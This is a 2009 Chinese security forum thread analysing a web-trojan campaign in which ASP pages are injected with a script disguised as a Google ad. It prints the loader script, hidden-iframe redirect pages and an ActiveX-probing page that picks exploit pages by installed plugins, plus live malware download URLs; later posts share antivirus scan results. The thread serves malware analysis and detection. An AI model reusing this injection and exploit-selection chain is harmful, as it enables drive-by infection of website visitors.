伪装GOOGLE广告的挂马方式

显示全部楼层 · 发表于 2009-3-23 11:24:38

所有的asp页面被挂
<script language="javascript" src="http://faq.ht.cx/office.js?google_ad_format=728x90_as&google_ad_type=text_image"></script>

查看http://faq.ht.cx/office.js内容为
var sc=document.getElementsByTagName('script');
var paramsArr=sc[sc.length-1].src.split('//')[1].split('?');
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
{
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<iframe src=http://www.rfgrgd.cn/33/new.htm width=100 height=0></iframe>');
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count47.51yes.com/sa.aspx?id=470909911&refe='+window.parent.location+'&location=http%3A//'+paramsArr[0]+'&color=32x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
}

http://www.rfgrgd.cn/33/new.htm内容为
<html>
<iframe src="au.htm" width=111 height=0 border=0></iframe>
<br>
<br>
<br>
<br>
<br>
<script type="text/javascript">
var allok=Math.floor(Math.random()*8000);if((allok>6500))
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/986651\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/986651\/ystat.gif\"\/><\/a><\/noscript>");

</script>

au.htm内容为
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
<html>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=tnt.htm></iframe>");
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=02.htm width=100 height=0></iframe>");
try{var d;
var lz=new ActiveXObject("GLI"+"EDown.I"+"EDown.1");}
catch(d){};
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var b;
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}
catch(b){};
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=bf.htm></iframe>");}}
try{var f;
var ff=new ActiveXObject("MPS.Storm"+"Player.1");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}
function Game()
{
Hdmddd = "IERPCtl.IERPC"+"tl.1";
try
{
Gime = new ActiveXObject(Hdmddd);
}catch(error){return;}
Tellm = Gime.PlayerProperty("PRODUCTV"+"ERSION");
if(Tellm<="6.0.14.552")
document.write("<iframe width=100 height=0 src=real.htm></iframe>");
else
document.write("<iframe width=100 height=0 src=real.html></iframe>");
}
Game();
</script>
</html>
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
里面的

http://www.tyjtre.cn/1.exe

自己下被，网马太多了，全用JS调用的加了密的，呵呵

显示全部楼层 · 发表于 2009-3-23 11:29:25

sample,URL to kl

[ 本帖最后由 sam.to 于 2009-3-23 11:30 编辑 ]

显示全部楼层 · 发表于 2009-3-23 11:31:50

还有2.exe

While trying to retrieve the URL:

http://www.tyjtre.cn/2.exe

The following error was encountered:

The requested object is INFECTED with the following viruses: Trojan.Win32.Agent.bwro

[ 本帖最后由 sam.to 于 2009-3-23 11:33 编辑 ]

显示全部楼层 · 发表于 2009-3-23 11:33:26

再仔细看看，估计还有很多

显示全部楼层 · 发表于 2009-3-23 11:35:29

3,4,5都沒有找到~~

显示全部楼层 · 发表于 2009-3-23 11:46:09

EAV扫描日志
病毒库版本: 3953 (20090321)
日期: 2009-3-23 时间: 11:46:59
已扫描的磁盘、文件夹和文件: G:\不杀\1.exe
G:\不杀\1.exe - 正常
已扫描的对象数: 1
发现的威胁数: 0
完成时间: 11:46:59 总扫描时间: 0 秒 (00:00:00)

显示全部楼层 · 发表于 2009-3-23 11:49:16

Der Suchlauf über die ausgewählten Dateien wird begonnen:

Beginne mit der Suche in 'D:\new\1.exe'
D:\new\1.exe
[FUND]    Ist das Trojanische Pferd TR/Dropper.Gen
[HINWEIS] Eine Sicherungskopie wurde unter dem Namen 4a2c0752.qua erstellt ( QUARANTÄNE )
[HINWEIS] Die Datei wurde gelöscht.
Beginne mit der Suche in 'D:\new\2.exe'
D:\new\2.exe
[FUND]    Ist das Trojanische Pferd TR/Dropper.Gen
[HINWEIS] Eine Sicherungskopie wurde unter dem Namen 4bad283b.qua erstellt ( QUARANTÄNE )
[HINWEIS] Die Datei wurde gelöscht.

Ende des Suchlaufs: 2009年3月23日  11:51
Benötigte Zeit: 00:00 Minute(n)

Der Suchlauf wurde vollständig durchgeführt.

   0 Verzeichnisse wurden überprüft
   2 Dateien wurden geprüft
   2 Viren bzw. unerwünschte Programme wurden gefunden
   0 Dateien wurden als verdächtig eingestuft
   2 Dateien wurden gelöscht
   0 Viren bzw. unerwünschte Programme wurden repariert
   2 Dateien wurden in die Quarantäne verschoben
   0 Dateien wurden umbenannt
   0 Dateien konnten nicht durchsucht werden
   0 Dateien ohne Befall
   0 Archive wurden durchsucht
   0 Warnungen
   2 Hinweise

显示全部楼层 · 发表于 2009-3-23 11:52:23

过咖啡8.7i和pctools

显示全部楼层 · 发表于 2009-3-23 11:55:24

Hello,

1.exe3 - Trojan-Dropper.Win32.Agent.akdr

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

显示全部楼层 · 发表于 2009-3-23 12:00:51

Virus: Dropped:Generic.Malware.P!dldPk!g.599259A8 (Engine A)

Virus beim Laden von Web-Inhalten gefunden.

Adresse: www.tyjtre.cn

[可疑文件] 伪装GOOGLE广告的挂马方式

本帖子中包含更多资源

回复 4楼 dayang1717 的帖子

浏览过的版块